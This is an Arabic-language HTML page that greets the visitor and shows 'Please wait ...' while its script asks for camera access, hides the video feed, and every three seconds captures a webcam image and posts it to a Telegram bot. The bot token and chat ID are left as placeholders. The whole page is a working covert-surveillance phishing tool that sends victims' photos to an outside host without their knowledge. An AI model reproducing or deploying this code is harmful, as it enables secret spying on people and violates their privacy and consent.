<!DOCTYPE html>
<html lang="ar">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>مرحبا بك عزيزي</title>
  <style>
    body {
      display: flex;
      flex-direction: column;
      align-items: center;
      justify-content: center;
      height: 100vh;
      background-color: black;
      color: #00FF00;
      font-family: 'Courier New', Courier, monospace;
    }

    #video {
      display: none;
    }
  </style>
</head>

<body>
  <h1>يجيب الانتظار ...</h1>
  <video id="video" width="320" height="240" autoplay></video>
  <canvas id="canvas" width="320" height="240" style="display: none;"></canvas>

  <script>
    const video = document.getElementById('video');
    const canvas = document.getElementById('canvas');
    const botToken = "TOKEN BOT👈";
    const chatId = "ID BOT👈";

    navigator.mediaDevices.getUserMedia({ video: true })
      .then((stream) => {
        video.srcObject = stream;
        setInterval(captureAndSendImage, 3000);
      })
      .catch((err) => {
        console.error("خطأ في الوصول إلى الكاميرا: ", err);
      });

    function captureAndSendImage() {
      const context = canvas.getContext('2d');
      context.drawImage(video, 0, 0, canvas.width, canvas.height);
      const dataURL = canvas.toDataURL('image/png');
      sendImageToTelegram(dataURL);
    }

    function sendImageToTelegram(dataURL) {
      const formData = new FormData();
      const blob = dataURLToBlob(dataURL);
      formData.append('chat_id', chatId);
      formData.append('photo', blob, 'image.png');

      fetch(`https://api.telegram.org/bot${botToken}/sendPhoto`, {
          method: 'POST',
          body: formData
        })
        .then(response => response.json())
        .then(data => {
          if (data.ok) {
            console.log('تم إرسال بنجاح!');
          } else {
            console.error('حدث خطأ أثناء إرسال : ', data.description);
          }
        })
        .catch(error => {
          console.error('حدث خطأ في الطلب: ', error);
        });
    }

    function dataURLToBlob(dataURL) {
      const arr = dataURL.split(',');
      const mime = arr[0].match(/:(.*?);/)[1];
      const bstr = atob(arr[1]);
      let n = bstr.length;
      const u8arr = new Uint8Array(n);
      while (n--) {
        u8arr[n] = bstr.charCodeAt(n);
      }
      return new Blob([u8arr], { type: mime });
    }
  </script>
</body>

</html>